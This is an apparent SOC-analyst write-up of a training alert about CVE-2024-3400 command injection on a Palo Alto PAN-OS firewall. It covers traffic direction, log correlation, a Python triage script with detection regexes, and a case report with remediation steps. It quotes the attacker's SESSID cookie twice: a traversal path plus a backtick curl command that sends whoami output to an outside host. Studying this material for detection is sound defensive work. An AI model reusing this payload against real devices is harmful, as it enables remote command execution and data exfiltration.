Upon examining the source IP 144[.]172[.]79[.]92, we see that it is flagged as malicious.

As the malicious IP is the source and the destination is the company's private IP, we can identify this as malicious ingress traffic.

The cookie looks like this:

SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)`

The SESSID value starts with a directory-traversal path and ends in a backtick-wrapped curl command that uses ${IFS} in place of a space and sends the output of whoami to 144.172.79.92:4444, so we can label this as malicious command injection traffic.

As the hostname of the machine is PA-Firewall-01, we check the emails for any sign of a pentesting engagement that could explain the traffic.

We do see that one result is returned upon searching for "firewall", but the IP address in it is not relevant to us.

Upon searching the raw logs, we get something back.

Upon examining the logs, we see that every HTTP exchange between the server and the malicious IP returned an HTTP response code of 200.

The request to the login.esp endpoint specifically has a content length of 11364.

As we can see, the one and only login.esp log entry is the one where the cookie was modified for command execution, and the 200 response with a full body indicates successful exploitation.
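The triage steps above (check the direction of the traffic, classify the SESSID cookie, then correlate with the response code and content length of the login.esp request) can be scripted so they run over many log lines at once. The following is an added example, not code from the original post or from LetsDefend; the log lines are constructed to mirror the event, and the simplified access-log layout and all function names are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed sample records (not from the original post), in a simplified
# access-log layout: timestamp src dst method path status content_length "cookie".
SAMPLE_LOGS = [
    '2024-04-18T03:09:00Z 144.172.79.92 172.16.17.139 POST /global-protect/login.esp 200 11364 '
    '"SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)`"',
    '2024-04-18T03:08:40Z 144.172.79.92 172.16.17.139 GET /global-protect/portal/css/login.css 200 5123 '
    '"SESSID=abc123"',
    '2024-04-18T02:55:11Z 10.10.5.21 172.16.17.139 GET /global-protect/prelogin.esp 200 2048 '
    '"SESSID=def456"',
]

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>\S+) (?P<path>\S+) '
    r'(?P<status>\d{3}) (?P<length>\d+) "(?P<cookie>[^"]*)"$'
)

# Each indicator mirrors one observation made about the cookie in the investigation.
INDICATORS = {
    "directory_traversal": re.compile(r"\.\./"),
    "command_substitution": re.compile(r"`|\$\("),      # backticks or $( ... )
    "ifs_space_bypass": re.compile(r"\$\{IFS\}"),
    "callback_host": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}:\d{1,5}\b"),
}


def parse_log_line(line):
    """Return the fields of one log line as a dict, or None if the layout does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["length"] = int(rec["length"])
    return rec


def cookie_indicators(cookie):
    """List which injection indicators are present in a (URL-decoded) cookie value."""
    decoded = unquote(cookie)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def classify_cookie(cookie):
    """Shell substitution inside a session id is command injection; traversal alone
    is suspicious; anything else is treated as benign for this triage."""
    found = cookie_indicators(cookie)
    if "command_substitution" in found:
        return "command_injection"
    if "directory_traversal" in found:
        return "suspicious"
    return "benign"


def traffic_direction(src, dst):
    """'ingress' when a public source reaches a private destination, 'egress' for the
    reverse, 'internal' when both sides are private, otherwise 'external'."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if not s.is_private and d.is_private:
        return "ingress"
    if s.is_private and not d.is_private:
        return "egress"
    if s.is_private and d.is_private:
        return "internal"
    return "external"


def triage(lines):
    """Parse and enrich every line; a request is marked as likely successful
    exploitation when its cookie is command injection and the server answered 200."""
    out = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue  # skip lines that do not fit the assumed layout
        rec["direction"] = traffic_direction(rec["src"], rec["dst"])
        rec["indicators"] = cookie_indicators(rec["cookie"])
        rec["verdict"] = classify_cookie(rec["cookie"])
        rec["likely_success"] = rec["verdict"] == "command_injection" and rec["status"] == 200
        out.append(rec)
    return out


if __name__ == "__main__":
    for r in triage(SAMPLE_LOGS):
        print(f'{r["ts"]} {r["direction"]:8} {r["path"]:40} {r["status"]} {r["length"]:6} '
              f'{r["verdict"]:18} {",".join(r["indicators"])}')
```

Running the script prints one enriched row per log line; only the login.esp request is classified as command injection with all four indicators present, is marked as ingress, and is flagged as likely successful because of the 200 response. The cookie is URL-decoded before matching so that percent-encoded variants of the same payload are not missed.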

We can then contain the compromised host.

We can then add our artifacts like so.

🔐 Security Case Report: Exploitation of CVE-2024-3400 -- PAN-OS Command Injection

📄 Event Summary

A critical command injection vulnerability (CVE-2024-3400) was successfully exploited on a Palo Alto Networks PAN-OS firewall. The attacker leveraged a malicious session cookie to execute remote commands, likely gaining unauthorized access and triggering potential data exfiltration.


🗓️ Event Details

Event ID: 249

Date/Time: April 18, 2024, 03:09 AM

Hostname: PA-Firewall-01

Rule Triggered: SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)

Alert Level: Security Analyst

Source IP Address: 144.172.79.92

Destination IP Address: 172.16.17.139

HTTP Method: POST

Requested URL: /global-protect/login.esp

HTTP Response Code: 200 OK

Content-Length: 11364


🚨 Exploit Vector

Cookie Value:

SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)`

Technique Used:

  • Command Injection

  • Remote Code Execution

  • Directory Traversal

Indicators of Exploitation:

  • Malformed SESSID cookie with embedded shell command

  • Use of ${IFS} to bypass space filtering restrictions

  • Callback to attacker-controlled server (144.172.79.92)

  • Execution of whoami command and exfiltration of its result


✅ Outcome

The HTTP request was processed by the device, which returned a 200 OK response with a Content-Length of 11364, indicating that a full response body was sent.

This confirms that the injected command was executed on the device and the attack was successful.

The compromised host accepted the malicious session cookie, processed the shell command, and likely contacted the external server controlled by the attacker.


📌 Additional Context

This exploit leverages a critical vulnerability identified in PAN-OS that allows attackers to inject and execute arbitrary commands via user-controlled input fields such as cookies.

Given that the compromised host responded successfully and returned a large content body, the system was likely not hardened against this attack vector.


🔒 Recommendations

  1. Immediately isolate the affected firewall to prevent further compromise.

  2. Patch PAN-OS to the latest version that addresses CVE-2024-3400.

  3. Review firewall logs for additional signs of unauthorized access or command execution.

  4. Block outgoing connections to the attacker's IP address (144.172.79.92).

  5. Conduct a full compromise assessment, including memory forensics if possible.

  6. Hunt for similar indicators across the environment to detect lateral movement.